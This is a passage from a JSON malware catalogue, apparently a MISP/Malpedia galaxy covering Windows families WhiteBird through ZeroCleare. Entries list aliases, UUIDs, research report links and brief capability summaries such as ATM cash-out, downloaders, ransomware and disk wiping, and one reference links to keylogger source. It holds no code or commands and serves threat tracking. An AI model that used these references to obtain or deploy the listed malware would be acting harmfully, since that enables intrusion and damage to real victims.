key. An interesting feature is that the malware can be restricted to operate only within certain \"working_hours\" with a granularity of one minute.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird", "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf" ], "synonyms": [], "type": [] }, "uuid": "20286294-3813-4c17-a165-ef12aae64303", "value": "WhiteBird" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire" ], "synonyms": [], "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog", "https://github.com/Thibault-69/Keylogger-Windows-----WinLog" ], "synonyms": [], "type": [] }, "uuid": "772099d0-b74a-4a73-9967-f1d40ab3ac92", "value": "winlog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", "value": "WinMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", "https://securelist.com/games-are-over/70991/", "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", "https://github.com/TKCERT/winnti-suricata-lua", "http://web.br.de/interaktiv/winnti/english/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", "https://github.com/superkhung/winnti-sniff", "https://content.fireeye.com/apt-41/rpt-apt41/", "https://content.fireeye.com/api/pdfproxy?id=86840", "https://github.com/br-data/2019-winnti-analyse/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://github.com/TKCERT/winnti-nmap-script", "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "BleDoor", "JUMPALL", "Pasteboy", "RbDoor" ], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, { "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", "https://securelist.com/atm-robber-winpot/89611/", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [ "ATMPot" ], "type": [] }, "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", "value": "WinPot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [], "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", "value": "Winsloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" ], "synonyms": [], "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", "value": "Wipbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [ "Syndicasec", "Wimmie" ], "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", "value": "WMI Ghost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", "value": "WndTest" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu" ], "synonyms": [], "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", "value": "Wonknu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" ], "synonyms": [], "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", "value": "woody" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "WoolenLogger" ], "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, { "description": "WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole", "https://content.fireeye.com/apt/rpt-apt38", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" ], "synonyms": [], "type": [] }, "uuid": "c1bff74d-873d-41ad-9f76-b341e6fe5cb9", "value": "WORMHOLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker", "https://twitter.com/Kangxiaopao/status/1355056807924797440" ], "synonyms": [ "WormLckr" ], "type": [] }, "uuid": "4cc30b46-53c0-45c4-8847-e3b228bf8d7b", "value": "WormLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot", "https://www.zscaler.com/blogs/security-research/malware-leveraging-xml-rpc-vulnerability-exploit-wordpress-sites" ], "synonyms": [], "type": [] }, "uuid": "454e0737-98d6-499a-8562-1adf5c081d0d", "value": "WpBruteBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] }, "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", "value": "WSCSPL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.x4", "https://www.gradiant.org/noticia/analysis-malware-cve-2017/" ], "synonyms": [], "type": [] }, "uuid": "107341e7-e045-4798-9fab-16691e86bc58", "value": "x4" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" ], "synonyms": [ "chopstick", "splm" ], "type": [] }, "uuid": "e8b38fbd-a7ce-4073-a660-44dfabc1b678", "value": "X-Agent (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" ], "synonyms": [], "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", "value": "XBot POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" ], "synonyms": [], "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, { "description": "According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", "https://github.com/eset/malware-ioc/tree/master/xdspy/" ], "synonyms": [], "type": [] }, "uuid": "2cf836f5-b88a-417d-b3c6-ab2580fea6ad", "value": "XDSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon", "https://twitter.com/3xp0rtblog/status/1331974232192987142" ], "synonyms": [], "type": [] }, "uuid": "09fd85b1-6fc9-45af-a37e-732b5fc6447b", "value": "Xenon Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm", "https://twitter.com/VK_Intel/status/1149454961740255232", "https://twitter.com/r3c0nst/status/1149043362244308992" ], "synonyms": [], "type": [] }, "uuid": "e78a2a31-8c20-4493-b854-c708e81b3f41", "value": "XFSADM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr", "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/", "https://twitter.com/r3c0nst/status/1166773324548063232" ], "synonyms": [], "type": [] }, "uuid": "ba99edf0-1603-4f54-8fa9-18852417d0fc", "value": "XFSCashNCR" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba", "https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html" ], "synonyms": [ "FlyStudio Ransomware" ], "type": [] }, "uuid": "e839ae61-616c-4234-8edb-36b48040e5af", "value": "XiaoBa Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10", "https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html" ], "synonyms": [ "FakeChrome Ransomware" ], "type": [] }, "uuid": "6aa7047f-7dfa-4a10-b515-853c3795db69", "value": "XP10 Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", "value": "Xpan" }, { "description": "Incorporates code of Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], "synonyms": [ "Expectra" ], "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat", "https://labs.k7computing.com/?p=15672", "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration" ], "synonyms": [], "type": [] }, "uuid": "d03cb3af-2a01-4e46-859a-6b61f3ec3c68", "value": "XpertRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [], "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver", "https://norfolkinfosec.com/filesnfer-tool-c-python/", "https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf" ], "synonyms": [ "Filesnfer" ], "type": [] }, "uuid": "b895ec07-19f7-4131-87c0-fc713fff2351", "value": "XServer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "nokian" ], "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", "value": "xsPlus" }, { "description": "X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ "Shunnael", "X-Tunnel", "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", "value": "XTunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net", "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28" ], "synonyms": [], "type": [] }, "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, { "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" ], "synonyms": [], "type": [] }, "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", "value": "Xwo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors", "https://www.macnica.net/mpressioncss/feature_05.html/", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-butler" ], "synonyms": [ "ShadowWalker" ], "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", "value": "xxmm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "KeyBoy" ], "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware", "https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html" ], "synonyms": [ "Teslarvng Ransomware" ], "type": [] }, "uuid": "0308eff9-1e8c-434e-b551-40f0ceb7dc0e", "value": "Yakuza Ransomware" }, { "description": "Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq", "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview", "https://twitter.com/GrujaRS/status/1210541690349662209" ], "synonyms": [], "type": [] }, "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6", "value": "Yarraq Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron", "https://securelist.com/ransomware-two-pieces-of-good-news/93355/" ], "synonyms": [], "type": [] }, "uuid": "710a27e6-0f17-4fa7-bcb9-e130fcb1ee7f", "value": "Yatron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" ], "synonyms": [ "aumlib", "bbsinfo" ], "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yellow_cockatoo", "https://redcanary.com/blog/yellow-cockatoo/" ], "synonyms": [ "Polazer" ], "type": [] }, "uuid": "f1d49672-b857-4ad6-887f-f2bf2bc7c641", "value": "Yellow Cockatoo RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos", "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf" ], "synonyms": [], "type": [] }, "uuid": "8d67586f-3390-474b-a81e-8be90833f25f", "value": "Yoddos" }, { "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" ], "synonyms": [ "DarkShare" ], "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", "value": "YoungLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.secureworks.com/research/threat-profiles/zinc-emerson", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/", "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/" ], "synonyms": [], "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.z3", "https://id-ransomware.blogspot.com/2020/08/z3-ransomware.html" ], "synonyms": [ "Z3enc Ransomware" ], "type": [] }, "uuid": "3eb96cd0-2d00-45a8-a0a4-54663cc70ab9", "value": "Z3 Ransomware" }, { "description": "Bitdefender describes the primary features of the family as follows: Presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercepts and decrypts SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and does browser redirects, potentially manipulating the DOM tree. It also creates traffic in hidden windows, likely causing adfraud. The malware is generally very configurable and internally makes use of Lua scripts.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zacinlo", "https://labs.bitdefender.com/wp-content/uploads/downloads/six-years-and-counting-inside-the-complex-zacinlo-ad-fraud-operation/" ], "synonyms": [ "s5mark" ], "type": [] }, "uuid": "5041fed8-25a2-4da2-b2ab-db2364cc064f", "value": "Zacinlo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", "https://research.checkpoint.com/malware-against-the-c-monoculture/", "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og", "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/", "https://meltx0r.github.io/tech/2019/10/24/apt28.html", "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ "Zekapab" ], "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", "value": "Zebrocy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", "value": "Zebrocy (AutoIT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" ], "synonyms": [], "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus", "https://labs.sentinelone.com/zeoticus-2-0-ransomware-with-no-c2-required/" ], "synonyms": [], "type": [] }, "uuid": "92e89ff1-eae9-4d71-9031-80cca544952e", "value": "Zeoticus" }, { "description": "Zeppelin is a ransomware written in Delphi and sold a as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but they assessed it as a new family becaue of additionally developed modules that makes Zeppelin much more configurable than Vegalocker. There are executable variants of type DLL and EXE.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin_ransomware", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html" ], "synonyms": [], "type": [] }, "uuid": "5587d163-d5ec-43fc-8071-7e7cd1002ba7", "value": "Zeppelin Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ "Max++", "Sirefef", "Smiscer" ], "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, { "description": "ZeroCleare is a destructive malware. It has been developed in order to wipe the master boot record section in order to damage a disk's partitioning. Attackers use the EldoS RawDisk driver to perform the malicious action, which is not a signed driver and would therefore not runnable by default. The attackers managed to install it by using a vulnerable version of VBoxDrv driver, which the DSE accepts and runs. Used to attack middle-east energy and industrial sectors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", 